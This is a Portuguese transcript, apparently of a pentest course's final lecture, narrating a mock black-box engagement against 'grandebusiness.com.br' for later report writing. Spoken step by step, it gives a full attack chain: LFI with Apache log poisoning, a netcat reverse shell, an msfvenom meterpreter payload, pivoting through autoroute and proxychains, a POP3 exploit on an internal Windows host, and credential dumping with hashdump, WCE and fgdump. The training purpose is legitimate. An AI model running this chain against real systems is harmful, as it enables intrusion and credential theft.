Olá pessoal, este é o último módulo do curso e é o módulo aí mais importante, que é a hora de gerar o resultado para o cliente, né? Então você já aprendeu toda a parte técnica, a parte comercial de como deve realizar a parte técnica de um pentest, mas você deve estar se perguntando como que você vai fazer o pentest, né? Então muita gente já tem o conhecimento técnico, mas tem uma certa confusão na hora de organizar essa informação, na hora de fazer um pentest real mesmo, né? E a ideia aqui é justamente mostrar como que a gente conduz um pentest, né? Como pelo menos a gente pode ir organizando as informações ao longo do pentest para depois a gente gerar o nosso relatório, né? Então, a princípio eu faço um rascunho mesmo, utilizando o bloco de notas, utilizando o script ali que eu vou mostrar agora, e vou jogando toda essa informação ali, para depois eu organizar essa informação e passar isso para o relatório, ok? Vamos lá então. Para a gente não ficar só na teoria, eu poderia falar exatamente como fazer isso, né, só passando slides, mas isso geralmente nunca fica claro, né, então eu gosto de mostrar como que a gente vai fazer isso. Então, vou utilizar aqui o grande business como nosso alvo, então faz de conta que eu fui contratado para executar um pentest aí no grande business, um pentest black box, onde eu não tenho nenhuma informação, a única informação que eu tenho é o URL. Então a primeira coisa que eu faço aqui é criar uma pastinha aqui chamada grande business, gbusiness, por exemplo. Certo? Então criei aqui minha pastinha gbusiness e aqui dentro da minha pasta gbusiness eu vou começar a jogar tudo que eu encontrar aqui, né? Então a primeira fase do pentest é a fase de reconhecimento e é justamente agora que a gente vai começar a ver o que a gente consegue descobrir sobre o grande business. Então, para todos os comandos e tudo que eu estiver digitando aqui, eu não perder isso, geralmente a gente pode utilizar o script. Então, comandinho script aqui, e aí eu coloco a saída que eu quero. Então, por exemplo, eu coloco sempre assim, ó, script recon, que significa de reconhecimento, né? Fase de information gateway. O que ele vai fazer? Ó, ele vai gerar um arquivo chamado recon. Só que tudo que eu digitar no... Esse ls, por exemplo, que eu acabei de digitar aqui, ele já salvou isso dentro desse arquivo. Depois que eu executar todos os comandos aqui, eu posso simplesmente dar um cat nesse recon e ele vai mostrar tudo que eu digitei nesse terminal. Tá? Então isso é bem interessante para a gente lembrar e ver tudo que a gente estava fazendo antes. Tá? Então geralmente eu sempre rodo um script jogando isso para um arquivo. Então a primeira coisa que eu vou fazer aqui, eu vou dar um ping "-c", só para a gente pegar "-c1" aqui, que vai ser só enviar um pacote para o site, que é grandebusiness.com.br, e pegar aqui o endereço IP dele, ó, que é 173.45, desculpa, 93.20. Aqui eu vou abrir uma outra janela aqui, que vai ser um leafpad, que é um bloco de notas, né? E eu vou fazer o seguinte, vou digitar aqui a data, por exemplo, dia 15/6/2016, a hora, que são 3h30 agora. E aí eu coloco aqui, ó, recon, que é a primeira fase, foi por onde eu comecei aqui, que é a fase de reconhecimento. E agora eu já começo a relacionar todas essas informações, ó, grandebusiness.com.br, esse endereço de IP aqui. E é que eu vou relacionando então tudo que a gente for descobrindo, ok? Vamos lá então. Eu posso acessar o site aqui, a princípio também, grandebusiness.com.br, dar uma navegada no site, justamente para a gente tentar descobrir alguns endereços. Ó, aqui nesse caso aqui a gente já descobre que ao passar o mouse aqui em clientes, ele leva para um outro endereço de IP ali, que é interessante para a gente, ó, intranet, e-mail. Isso aqui tudo são informações interessantes que a gente já pode relacionar. Endereços de e-mail. Então essa análise aqui a gente poderia até fazer com aqueles scripts que a gente aprendeu a criar em aula. Então aqui eu relaciono endereço de e-mail e tudo que nós fomos descobrindo, certo? E agora eu já executo um ruiz aqui nesse endereço de IP. E aqui ele traz algumas informações, ó, sobre o bloco de rede. Ó.
ou exatamente o net range que é dessa empresa Grande Business. Que isso é interessante para a gente saber exatamente qual bloco de IP essa rede, quais são os IPs que estão envolvidos nesse cliente. Outra coisa que a gente pode fazer aqui, rodar aqui um Fierce, por exemplo, para fazer uma pesquisa de DNS, grandebusiness.com.br. Ó, descobriu os name service, tá com a transferência de zona habilitada, então a gente consegue descobrir algumas informações interessantes aqui. Vou copiar. Aqui nós podemos ver que ele tem um outro range de IP aqui, um outro IP que responde numa outra faixa. Posso copiar aqui, utilizar aqui um Ruiz desse endereço de IP para descobrir o bloco dele também. Aqui nesse caso aqui ele mostra esse outro range. Então até o momento nós já descobrimos 2 ranges de IP. Nós podemos organizar essa informação aqui, né? Os endereços de e-mail. Range. Aqui são as informações de DNS. Poderia utilizar aqui também um brute force DNS, por exemplo, aqueles scripts que a gente utilizou, né? Eu mostrei várias formas de fazer isso. Aqui no caso eu vou utilizar, por exemplo, um script que eu criei, que é o DNS rato. Então, grandebusiness.com.br. Vou utilizar a lista do rato.txt também. Ele começou a encontrar aqui. Enquanto ele está fazendo essa pesquisa aqui, fazendo brute force, para descobrir outros possíveis endereços aí através de resolução de nome, nós podemos utilizar aqui Google Hacking para fazer alguma busca também no site. Então, por exemplo, aqui é grandebusiness.com.br para ver o que ele retorna. Nesse caso aqui o site é pequeno, ele não tem muito retorno, né? Então de cara a gente já vê aqui que ele tem, por exemplo, um RH.grandebusiness, que tem uma aplicação de RH aqui. Tem aqui uma outra aplicação que é uma página de login. Posso copiar também e trazer isso para nossa aqui, ó, Google Hacking, trazer esse link aqui para posteriormente nós começarmos a analisar essas informações que a gente está juntando aqui. Então aqui nesse range de IP aqui, por exemplo, a gente já pode varrer esse range de IP para descobrir quais portas e serviços estão ativas aqui. Esse outro range de IP aqui também, nós podemos detectar aqui, ó, que vários dos hosts aqui, intranet e e-mail, por exemplo, são o mesmo servidor, porque ele retorna para o mesmo endereço de IP. Então alguns aqui estão repetidos porque, na verdade, é o mesmo endereço de IP. Isso é interessante porque às vezes um único servidor está respondendo para vários serviços, tá? Vamos voltar aqui no DNS rato. Bom, ele terminou aqui, vou copiar. Muitas vezes esse tipo de abordagem aqui, né, de fazer utilizando uma word list, pode retornar coisas que você não vai encontrar usando um Fierce, né? O Fierce tem, o brute force também, mas é sempre bom a gente fazer esse tipo de ataque aqui, porque às vezes ele pode revelar algum IP, alguma coisa que estava escondido aí. Bom, aqui nós conseguimos já bastante informação para a gente trabalhar, começar a analisar esses endereços de IP, aplicações, o que tem aqui, né? Geralmente o que a gente faz durante um pentest é ir seguir aqui pelas falhas mais triviais, né? Ah, mas por quê? Porque geralmente é o caminho, geralmente a gente sempre vai buscar o caminho mais simples de tentar fazer o ataque. E conforme formos tendo problemas para fazer esse ataque ou para fazer essa exploração, a gente vai aumentando aí o nível de complexidade do ataque. Então, por exemplo, aqui em Google Hack a gente encontrou uma aplicação aqui já de cara. Então a gente já pode começar a analisar essa aplicação aqui. Então a gente vê que ele tem um parâmetro passando via GET aqui. Ele tem aqui um form de login e senha, que a gente também pode testar esse input aqui. E aqui a gente vê que ele altera alguma coisa aqui em cima.
Colocar aqui uma aspa simples, ele retorna um warning aqui, um erro, né? E aqui ele está falando que ele não tem esse arquivo aqui, né? Que tenha aspas. Nesse caso, essa falha aqui é uma falha de LFI, como eu já expliquei nas aulas de web, né? Então, como nós vimos, ele passa inclusive aqui o patch, né, o caminho completo. Então, se a gente voltar aqui dois diretórios, tentar ler o etc pswd, no caso ele não conseguiu ler porque ele colocou o ponto .php, a gente pode pôr um byte aqui e conseguimos ler. E depois de fazer uma análise, né, no que a gente consegue ver sobre o alvo, a gente descobre que a gente consegue ler, por exemplo, o arquivo de log do Apache. Log var log apache 2 access.log e coloco no byte no final. E aqui a gente está vendo o arquivo de log do Apache. Bom, se a gente consegue enxergar o log do Apache, a gente pode tentar fazer um ataque aqui. Então, a gente pode salvar essa URL aqui também, colocando aqui no final, LFI. E aqui a gente já poderia iniciar aqui um ataque, que seria a gente criar aqui uma shell para a gente fazer um ataque a essa URL. Então, por exemplo, aqui eu posso já preparar minha shell utilizando PHP, system. Aqui eu vou utilizar o get, coloco XPL aqui, qualquer coisa aqui, cmd, command, que é o parâmetro que eu vou passar para poder fazer o ataque. Então aqui eu vou colocar, por exemplo, XPL. Vou copiar. E aí, vamos utilizar aqui o netcat para fazer uma conexão com esse alvo. Então 209. Ou melhor, vou pôr pelo IP mesmo. Vou colocar pelo nome mesmo. rh.grandebusiness.com.br na porta 80. Abriu. Ao invés de mandar uma requisição, vou mandar minha shell. Mandei. Ele deu aqui um bad request. Deu um erro. E o que importa é que se a gente voltar aqui na nossa requisição, aqui no nosso log do Apache, aqui no final, a gente vai ver que ele recebeu esse acesso aí. Vamos localizar aqui. Ó, a última requisição que foi feita aqui, ó, ele deu um erro no system, falando que o system não pode ser vazio. Ou seja, ele tentou executar o system. Por que que isso acontece? Porque aqui, deixa eu voltar aqui. Porque aqui a gente se trata de uma aplicação PHP e a gente acabou de infectar o log do Apache. Como a gente consegue ler o log do Apache, ele interpreta isso como texto apenas, porque é só texto que tem lá dentro. Porém, como a aplicação é em PHP, ele consegue interpretar PHP. Se a gente jogou isso daqui dentro do log do Apache, a gente jogou essa requisição falsa, ele gravou isso dentro do log do Apache. E aí quando a gente lê o log, que é tudo texto, a hora que ele chega nessas tags aqui, ele fala, PHP eu entendo. E aí ele consegue interpretar isso e fala que o system aqui ele não pode ser vazio, certo? Então aqui a gente pode passar agora o parâmetro que a gente colocou ali, que é o XPL. Coloca aqui XPL igual um comando que eu quero executar, por exemplo, o name -a, seguido aqui do e-comercial para ele fazer a execução. A gente voltar aqui para o final, na última requisição, ele tem aqui, ó, o que foi executado. E eu poderia alterar o name "-a" aqui para outra coisa, por exemplo, qualquer comando do Linux, o ls-la. E aí ele listaria todos os arquivos, ó. Pode ver que ele está mostrando vários aqui, ó. Permissão de arquivo, www.data, o nome do arquivo, certo? Então, com isso, eu já consegui transformar esse LFI em um command execution.
né? Eu consigo jogar comandos aqui e executar do lado do servidor. Então, command execution. Posso colocar isso dessa forma aqui, porque minha shell está lá. E agora eu posso transformar isso em uma shell mesmo, né? No meu próprio terminal aqui. Para isso, eu precisaria abrir uma porta então na minha máquina. Eu vou olhar meu IP aqui, que é o 92.168.106, e posso abrir então uma porta aqui no meu Kali. Vou colocar a porta, por exemplo, 443. Deixei aberto aqui. Vou olhar qual que é meu IP. Meu IP externo mesmo, já que esse é um ataque real. Copio aqui meu endereço de IP. E aqui, ao invés de eu mandar um comando, vou mandar um netcat. Supondo que o Linux, a maioria das distribuições já vem com netcat default, né? Então, eu passo meu endereço de IP, a porta 443, que é a porta onde ele vai se conectar, ou seja, minha máquina, porque eu estou fazendo uma conexão reversa, o "-e", e passo aqui o bin bash, que é o que eu quero que ele mande para mim, o que ele execute, bin bash. Ou seja, eu estou falando para ele mandar o shell dele para a minha máquina aqui. Mandei isso, olha o que aconteceu, acabei de ganhar acesso a esse servidor. Então, nesse momento aqui, ó, estamos dentro de var www do servidor logado como www.data, que é o usuário do Apache. Se eu dar um ls aqui, eu vejo todos os arquivos no servidor. Então, nesse exato momento aqui, a gente acaba de ganhar acesso a esse servidor. Vou colocar aqui reverse shell. Para a gente sempre ter isso anotado. Nesse momento aqui, a gente poderia até tirar um print. Vou tirar um print dessa tela aqui, que é a prova de que a gente ganhou acesso a esse servidor. Mas o ataque ainda só está começando, né? Aqui a gente só identificou um vetor, uma falha, explorou essa vulnerabilidade e ganhou acesso a esse servidor. Mas o que interessa é a gente conseguir acessar o servidor lá da rede interna. Posso dar aqui um ifconfig, por exemplo, ó, não consigo ver, ele não traz o retorno do ifconfig. Netstat, eu acho que ele traz. Ó, o netstat ele até traz. Mas o ifconfig não. Então, o que a gente poderia fazer aqui, eu poderia cancelar essa shell aqui. E a gente poderia gerar uma shell utilizando o metasploit. Para isso a gente vai começar a utilizar então o metasploit para ficar mais fácil após a exploração aqui. Então vou gerar um backdoor aqui, né, um payload para Linux utilizando o MSF Venom. "-p", colocar aqui Linux, x86, meterpreter, reverse, TCP. Vai ser de conexão reversa para Linux. Query host, coloca aqui o IP, o meu IP, né, no caso. Lport, a minha porta, no caso 443. Ou posso colocar uma outra porta aqui, por exemplo, 8443. "-f, elf, e vou jogar isso para dentro de um arquivo chamado shell. Ou seja, ele vai gerar um binário com o nome de shell que vai fazer uma conexão reversa e ganhar acesso através do metasploit. Aqui eu dou um service PostgreSQL start para a gente iniciar o Postgre. Em seguida, o MSF console para a gente iniciar o metasploit. Lembrando que todos esses comandos que eu estou fazendo aqui, ele está gravando isso, gravando essa saída do terminal para posteriormente a gente
ter isso salvo. Vou utilizar aqui use exploit multi-render, show options, set payload, Linux, e utilizar o mesmo payload que a gente acabou de gerar. x86, interpreter, reverse TCP. Show options novamente, set lhost, coloco o IP, meu IP no caso, que é onde ele vai retornar. Set lport 8443. Vou dar um exploit aqui, que ele vai ficar escutando isso. E agora, eu preciso, agora que eu já gerei minha shell, né, eu vou abrir um outro terminal aqui. Vamos lá para dentro de desktop, gbusiness, tá aqui, ó, o arquivo shell. É o arquivo que eu preciso jogar lá dentro desse servidor aqui, para a gente poder ganhar acesso dentro do Metasploit, que é onde ele está guardando a conexão aqui. Então eu preciso enviar isso para o servidor. Como que eu vou fazer isso? Eu posso utilizar o Netcat mesmo para fazer essa transferência. Então aqui no caso, eu faço o seguinte. O Netcat, ele vai se conectar aqui no IP. Vou deixar aqui. Vou fazer o seguinte, ó. Vou abrir uma porta aqui, 443 na minha máquina. E eu quero que ele envie o shell aqui para essa porta 443 da minha máquina. E agora eu falo para ele se conectar na minha máquina. E depois que ele se conectar, ao invés de ele mandar shell, por exemplo, ele vai salvar isso em var www shell. Ao fazer isso, ó, ele fez a conexão. Nesse caso aqui a gente não ganhou uma shell, mas o que ele fez? Ele abriu uma conexão entre as duas portas e aqui na minha máquina ele está enviando a shell e na máquina do alvo ele está recebendo a shell dentro de var www com o nome de shell. Então a gente pode deixar um tempo aqui, ele tem, não lembro o tamanho, mas eu acho que é 71 o tamanho dessa shell aqui. Então é bem levinho. Deixa um tempinho aqui. Depois a gente pode cancelar aqui. Utilizar aqui novamente o menu Z. Para ganhar acesso. /bin bash. Abro novamente a porta aqui, só que agora não vou enviar a shell, só para a gente checar se ele está lá. E faço a conexão. Pô, ganhei o acesso novamente. E olha aqui, ó. Agora a gente tem a shell que a gente acabou de transferir via Netcat lá no nosso alvo. Então, file shell, só para a gente ver. Ah, ele mostrou aqui, ó. Arquivo executável e tal. Voltar aqui no Metasploit, ó, ele está guardando a conexão. A gente ainda não executou esse shell aqui. Então vamos executar ele. Antes, vamos dar um chmod 777 shell. E agora eu vou fazer a execução. Vou colocar só do lado aqui, para a gente ver que a hora que eu fizer a execução do shell, a gente vai ganhar acesso no Metasploit. Ó. Pode ver que ele está transmitindo, enviando estágio aqui. Vou vir aqui para o Metasploit. E ó, uma sessão foi aberta. Meterpreter, se eu dar um help aqui no Meterpreter, já tem os comandos que eu posso utilizar aqui. O interessante aqui é que agora se eu executar ipconfig, por exemplo, ó, ele já traz as configurações de IP da máquina alvo. Ó. E olha que interessante, ó, 172.16.1.8, ele está trazendo o IP
local desse servidor que a gente acabou de ganhar acesso. Tá? Então esse aqui não é o IP externo. O IP externo dele é aquele 209, 190. Aqui a gente já está vendo o lado de dentro da rede. E é isso que importa, porque uma vez que a gente tem uma interface aqui dentro da rede, a gente pode explorar todo o resto dessa rede, desse alvo. Então, a gente poderia executar vários comandos aqui, ó, ls, porque é a mesma coisa, né? A gente tem uma shell até mais bonita do que a shell que a gente tem aqui com o Netcat. Eu posso até fechar essa shell do Netcat, cancelá-la aqui, porque agora eu já tenho uma shell dentro do Metasploit. E por quê, né? Por que eu quis fazer a mesma coisa para ter isso dentro do Metasploit? Porque o Metasploit ele tem alguns recursos interessantes que vão agilizar a nossa vida. A gente aprendeu isso tudo durante a aula, inclusive fazer tunelamento via o Soulcat, enfim. Mas aqui a gente vai ver como a gente pode fazer pivot de uma forma bem simples utilizando o Metasploit. Aqui eu poderia utilizar o comando shell para já ganhar essa shell no alvo, ou utilizar os comandos que o Meterpreter tem aqui, mas eu posso dar um background, e aí ele continua com essa seção aberta, e aí eu posso utilizar qualquer outro módulo do Metasploit aqui. E tem um módulo bem legal que a gente pode utilizar para começar a varrer a rede interna. Eu posso utilizar o Sessions aqui para voltar, Sessions-L. Ele mostra as sessões que eu tenho, Sessions-I 1, eu volto aqui para o meu Meterpreter. Eu posso executar também, utilizando o run aqui, alguns módulos, ó. Alguns módulos bem interessantes que ele tem aqui, ó. ARP Scanner, enfim, vários módulos que ele tem aqui. E aqui, se a gente voltar aqui e dar um if config novamente, ele mostra as interfaces que ele tem aqui. Se eu der um comando route, ele mostra a rota, ó. Então, ele fala que essa rede aí, que é 172.16.1.8, ela tem rota através de 172.16.1.0, que é a rota dela aqui numa rede com máscara 255.255/24 aí no caso, né? E aqui o que a gente pode fazer seria adicionar essa rota para a nossa máquina, para a gente ter a rota dessa rede interna no nosso Kali, na nossa máquina de ataque. Então, para isso a gente utiliza AutoRoute "-s", e aí eu posso definir aqui a rede 72.16.1.0/24. Se eu dar um AutoRoute novamente, acho que "-l", deixa eu ver se é isso, "-p", né? Ele mostra as rotas ativas, ó. O "-p" ele lista todas as rotas ativas. Então agora a gente tem uma rota ativa. Olha que interessante, ele falou que ele adicionou essa rota através desse IP aqui, que é o IP do alvo, né? Ou seja, a gente acabou de criar uma rota para a gente utilizar e conseguir enxergar essa rede através do nosso Kali. Agora eu posso vir aqui para background e vou utilizar um outro módulo, que é um módulo para criar um proxy. Então eu utilizo aqui use um módulo auxiliar, no caso, server, acho que é proxy, deixa eu ver se é proxy, server socks for ele, show options. Esse módulo aqui, ó, posso até dar um info nele para ele mostrar o que ele faz, ó. Deixa eu ver se ele fala aqui a descrição. Ele não fala, mas ele é um proxy. Aqui, ó, esse módulo fornece um servidor proxy utilizando uma rota que tem aqui no Metasploit. Ele utiliza a porta 1080. Então, só para a gente entender aqui, se eu dar um netstat, agora na minha máquina eu só tenho essa porta aberta aqui, ó. Certo? Não tem nenhuma outra, que é a do PostgreSQL. Certo? Não tem nenhuma outra porta aberta. A partir do momento que eu ligar esse proxy aqui, meu Kali vai ter uma porta 1080 aberta aqui. Então vou dar um run, ó, ele está executando. Se eu dar um netstat novamente, ele abriu a porta 1080. E uma vez que eu tenho essa porta 1080 aberta no meu Kali, eu posso agora configurar, por exemplo, proxy chains, para ele utilizar essa porta 1080 como proxy. Então vamos fazer isso.
etc proxy chains.conf. Lá no final dele, ele tem as configurações de porta dele. Aqui, ó, ele tá para usar o Tor, né, a 9050. A gente pode vir aqui e mudar isso para 1080. Ou seja, quando a gente estiver utilizando proxy chains, ele vai estar passando pela porta 1080. A porta 1080 tem a rota. Deixa eu fechar essa janela aqui, para não ficar confuso. A porta 1080 tem a rota, essa porta aqui agora, ela tem a rota para essa rede aqui, ó. Que é a rede que a gente criou a rota aqui, ó. 172.16.1.0. Então agora, se eu utilizar o proxy chains, eu consigo varrer essa rede, porque eu tenho uma rota passando pelo proxy. Então eu tenho que utilizar o proxy chains. Em seguida eu utilizo qual programa que eu vou usar. Então no caso aqui o Nmap. Então o Nmap vai passar pelo proxy chains que tem a rota para essa rede. Então "-v", se eu não fizer isso, eu não tenho como atingir essa rede, porque a gente está trabalhando agora diretamente com a rede interna lá. Então "-st", por exemplo, que é o TCP Connect, --open para pegar as portas abertas, o "-p" para passar, poderia passar todas as portas, o que ia demorar um bocado, poderia passar --stop ports, para ele fazer pesquisas nas top portas, né, nas portas mais usadas, ou posso utilizar aqui as portas que eu quero testar internamente. Eu quero já procurar por SMB lá dentro da rede, então 139.445. Não, quero pesquisar por portas 80, quero pesquisar por SSH, por serviço de e-mail, enfim. Então nesse caso aqui eu vou colocar a porta 110, né, para a gente não tomar tempo, porque como a gente está passando por um proxy, ele vai demorar bastante. Né? Nos testes de vocês podem rodar aí na rede inteira, vai ver que vai demorar um bom tempo aí para ele mapear toda essa rede, fazendo esse procedimento, ok? Vamos lá então. E por último aqui eu posso passar o "-pn", para ele não fazer o ping, né? Para ele não tentar ver se o host está vivo. E aí eu passo a rede, 172.16.1.0/24, ou seja, eu quero varrer toda a rede lá no nosso alvo. Bom, aqui a gente pode ver, ele começa a fazer execução, ele fala aqui que ele está passando pelo proxy, certo? E olha que interessante, aqui ele encontrou um host, ó, 172.16.1.4, ele fala que tem a porta 110 aberta. A gente não sabe exatamente o que está executando nessa porta, mas ele já identificou que está aberta. Eu vou cancelar aqui, mas já deu para sacar a ideia, né? Então, basicamente, se a gente fizer um scan aqui em top ports ou nas portas que você quiser, você consegue atingir aquela rede porque a gente fez esse procedimento aí, que é basicamente uma técnica de pivot. Uma forma da gente interagir com esse serviço que está nesse outro host, né? Notem que a gente está falando de uma outra máquina que está dentro dessa rede, da rede interna, né? Que não está exposta diretamente para a internet, que é essa 172.16.1.4. A gente não sabe o que está rodando nessa porta. Então eu poderia vir aqui no Metasploit, voltar aqui para a seção sessions-l, sessions-i1, voltei aqui para o Meterpreter, e eu posso utilizar aqui o port FWD para encaminhar, fazer o encaminhamento da porta 110 dessa máquina, 172.16.1.4, para a minha máquina local, né, para o meu Kali. Como que eu faço isso? Port, posso até utilizar o "-h" aqui que ele mostra as opções, ó. Mas é port, "-l, passo a porta aqui, 110, o "-p", que é a porta remota, que é a 110, ou seja, eu estou passando o mesmo número de porta. Então a porta 110 de qual alvo? "-r" aqui, que é o host remoto, 172.16.1.4, que é a máquina que a gente identificou com a porta aberta lá no alvo. Então eu estou encaminhando essa porta 110 dessa máquina para uma porta local 110 no meu Kali. Se eu vir aqui e dar um netstat aqui, para ver as portas abertas no meu Kali, eu não tenho porta 110 aberta aqui. Se eu fizer esse encaminhamento de porta, vou voltar aqui, ADD, né? Tem que adicionar isso. Pronto, agora ele fez, ó. Se eu fizer isso, olha o que acontece. Ele acabou de abrir uma porta 110 na minha máquina, no meu IP do meu Kali. Ou seja, se eu voltar aqui e fizer agora um Nmap direto, né? Nmap -v, -svzão, para pegar a versão dessa porta,
na porta 110 de qual máquina? Não posso passar que é um 721614 porque eu não estou passando proxy chains aqui. Então eu passo um 27.0.0.1, meu IP local. Você fala, mas seu IP local, como assim? Lembra que eu acabei de adicionar o encaminhamento de portas aqui, ó. Para onde ele adicionou? Para minha máquina local. Então eu passo meu IP local aqui. E olha que interessante, ó. Ele mostra qual serviço exato está rodando lá nessa máquina, lá no alvo. Né? Então ele está rodando aqui um SL-meio, né? Um serviço de POP3 SL-meio na porta 110. Eu posso dar um background aqui, dar um search no meu Metasploit por SL-meio. Ou poderia pesquisar mais sobre esse serviço e ver se eu descubro algum exploit na internet, criar o exploit, enfim, depende muito da ocasião. Nesse caso aqui, o Metasploit tem esse exploit aqui, então posso pôr use show option aqui, e aí ele fala aqui qual o host, né, o remote host e qual a porta. Nesse caso aqui, qual que é o remote host aqui? 172.16.1.4, que é o IP do workstation que está nessa máquina aí, nessa rede aí, que a gente identificou aberta. A porta vai ser 110 mesmo. E aí a gente vai setar o payload agora. Set payload, vai ser um payload para Windows, porque é uma máquina Windows, Meterpreter, reverse, TCP, que eu quero fazer uma conexão reversa. Show options, e aí sim, eu posso passar minha L-port, minha porta local, vou pôr aqui set L-port 7070, por exemplo, set L-host, aí eu preciso pegar o meu endereço IP aqui, porque eu vou fazer uma conexão reversa para minha máquina aqui. Show options. Então, o que eu fiz aqui? Setei, então, essa máquina que a gente identificou, 172.16.1.4 na porta 110, e aqui a minha máquina na porta 7070. Vou abrir essa porta na minha máquina e fazer esse alvo se conectar, explorando o SL-meio, que é o serviço que a gente identificou lá. Vou dar um exploit. Ele está tentando, está enviando aqui o estágio do payload. Vamos ver se a gente consegue uma shell nessa estação de trabalho aí. Perfeito, ó. Sessão aberta, sessão 2 aberta. Então se eu dar um sessions, melhor, eu já estou dentro do Meterpreter, né? Se eu dar um help aqui, ele mostra as opções aqui que tem desse Meterpreter. Se eu der um ipconfig, eu vejo as configurações dessa máquina. Notem que agora eu não estou mais num 72.16.1.8, eu estou num 72.16.1.4. Eu acabei de ganhar acesso a uma estação de trabalho, certo? Então eu posso, só para a gente não se perder, né, no intuito aqui da aula, eu vou copiar aqui o nome desse exploit que eu estou utilizando, abrir o nosso bloco de notas aqui, anotar aqui os endereços de IP, web server RH. Esse era o IP do web server RH que a gente identificou, certo? Essa aqui é a rede interna que a gente identificou, que é a rota dessa rede. E um 72.16.1.4, a gente identificou que tem a porta 110 aberta, rodando o SL-meio, que é vulnerável a esse exploit aqui. É interessante a gente anotar todas essas informações, porque depois a gente vai precisar escrever o relatório. Bom, voltando aqui para o ataque. Nesse momento aqui, então, a gente está dentro agora de duas máquinas. Primeiro, esse web server aqui. A gente está dentro dessa máquina do RH aí, desse servidor. E agora dentro de uma estação de trabalho. E é uma coisa interessante aqui. A gente pode executar qualquer um desses comandos aqui. Pode ganhar uma shell, pode ver o que tem dentro aqui dessa pasta onde a gente caiu aqui, certo? E eu poderia utilizar aqui o hash dump para capturar os hashes dessa máquina aqui, ó. Então eu vou copiar aqui e já consegui alguns hashes
nesse terminal aqui. Ou seja, esses hashes eu posso utilizar para tentar quebrar a senha de administrador, essa senha da Rafaela, certo? Porém, a gente não pode ficar limitado a apenas isso, né? Isso aqui já é muito bom, se a gente conseguir quebrar essas senhas aqui. Posso jogar isso para um John, para a gente tentar quebrar. Mas também a gente pode utilizar aí aquelas técnicas mais avançadas que a gente viu, de utilizar pass the hash, ou até mesmo utilizar o FGDump, WCE, para tentar conseguir a senha em texto claro, né? E para isso a gente precisa fazer o upload para dentro dessa máquina aqui. Então eu posso fazer o upload, passo o caminho aqui, o SR share WCE universal, para onde eu quero jogar isso? Para dentro de C2 pontos, lá do Windows. Acesso negado. Deixa eu ver se ele mostra aqui o caminho. C2 pontos barra. Agora sim, ó. Ele copiou para dentro de C2 pontos barras. Vamos dar só um dir aqui para a gente ver se de fato ele copiou. ls C2 pontos barra. Tem hora que eu acho que eu estou no Windows. Cadê? Ó, WC universal.ez. Ele copiou para cá, para dentro do C2 pontos. Perfeito. Então eu estou copiando o WCE e eu também quero copiar o FGDump. Char Windows, binários do Windows aqui, FGDump e FGDump.ez para dentro do C2 pontos também. Bom, a gente viu que a gente acabou de capturar o hash, mas eu gosto de usar essas duas ferramentas porque o WC ele consegue muitas vezes pegar sem texto claro, né? E o FGDump consegue pegar usuários em cache aí, ou seja, uma autenticação de um possível AD. Vou dar agora um shell. E agora eu estou dentro do Windows aqui, certo? Vou voltar aqui. Posso até voltar direto aqui para C2 pontos, ó, dir. Estou dentro do Windows, né? Dessa estação de trabalho. Eu posso executar então wc-universal.ez -w para a gente tentar pegar o usuário em texto claro. E olha aqui, ó. Rogério, né? O usuário. Ele já pegou também o nome do domínio, que é o gbusiness, e a senha roger@10. Vamos anotar isso aqui também. São informações importantes para a gente. O outro caso aqui é a gente executar o fgdump.ez. Ao executar, ele vai gerar dois arquivos, que é esse aqui, cachedump, e o pwdump. Então vamos dar um type para visualizar esses arquivos, 127.0.0.1.pwdump, né? Ele traz aqui o que ele conseguiu. É importante a gente copiar isso também, se der algum problema a gente tem salvo. E vamos dar um type também no 127.0.0.1.cachedump. E olha que interessante, né? A gente vê que aqui ele tem Rafaela, ele tem o administrador e tal, mas ele não tem o Rogério, né? E o Rogério ele só aparece no cachedump. Isso eu já expliquei, né, no módulo que a gente falava sobre esse tipo de ataque. E aqui ele tem então o Rogério que está autenticado via domínio, ó. gbusiness.rede é o nome do domínio dessa máquina. Vou salvar isso aqui também, só para a gente ter todas essas informações salvas. E aqui eu vou dar um ip config/all para ver todas as configurações de rede dessa máquina. E aqui a gente vê que tem, nos servidores DNS a gente tem um 72.16.1.60. E aqui nesse 60 aqui, geralmente como ele está como DNS dessa estação de trabalho,
bem provável, né, se você conhece um pouco sobre configuração de AD, é bem possível que esse seja o AD da rede. Então vou anotar aqui esse P aqui também. Bom, vou fechar, voltei para o Meterpreter, vou dar um background aqui novamente. As sessões ainda estão abertas, ó, Sessions-L, eu tenho 2 acessos lá, um nesse XP e um no Linux, certo? E aqui eu vou voltar para o Proxy Chains aqui, vou focar agora no IP 60, por exemplo, posso verificar algumas portas se estão abertas ou não. Por exemplo, porta 139, porta 445, uma vez que esse servidor é um AD, né? Porta 3389, que é de acesso remoto. E aqui, olha que interessante, ó, ele trouxe a informação aqui já pra gente que esse host, por exemplo, tem essas 3 portas abertas. Ó. Ou seja, a gente consegue interagir com esse serviço, basta a gente fazer no encaminhamento dessas portas para a nossa máquina local e depois interagir com o serviço. Vamos fazer isso então. Vou voltar aqui para a sessão. Vou voltar para a sessão aqui 2. E aqui eu vou utilizar então port FWD, ADD, "-L, porta 3389, "-P, 3389, que é a porta do Terminal Service, né, do acesso remoto. E o "-R, que é o IP da porta que eu quero encaminhar, 172.16.1.60. Beleza, ele encaminhou essa porta agora para minha máquina local. Opa, deixa eu abrir o outro terminal aqui. Ah, ele fechou a conexão. Ó, essa conexão morreu. Vou dar um background aqui. Sessions novamente. Ó, o Linux caiu. Vou dar um back. Use exploit multi-render. Show options. Exploit. Vou abrir novamente a conexão lá, porque caiu a conexão aqui no servidor. Ele acessa. Executando a shell lá. Ah, beleza, ó, tá transmitindo. Vamos ver se a gente ganha acesso novamente. Pode acontecer isso, né? A gente está no meio de um ataque real, pode cair a conexão por algum motivo, timeout, enfim. O importante é que a gente já ganhou acesso novamente. Bom, aqui a gente vai precisar utilizar o AutoRoute novamente, "-S, para definir a rota de novo, porque agora a gente não tem mais essa rota porque caiu a conexão, a gente vai ter que fazer de novo. Então, gerei a rota, perfeito. Posso utilizar o port FWD novamente aqui. Então, "-L, 3389, "-P, 3389, "-R, 172.16.1.60. Adicionou então a porta localmente aqui para mim. Vamos só fazer um teste. RDesktop 127.0.0.1. Está local aqui a porta 3389. Ah, ele não abre com o RDesktop. Deixa eu ver se ele abre com o XFreeRDP. Não tenho ele instalado, vou instalar. Esse XFreeRDP ele é um outro software igual ao RDesktop para a gente conseguir visualizar terminal service no Windows Server, por exemplo, ou uma conexão remota de um Windows.
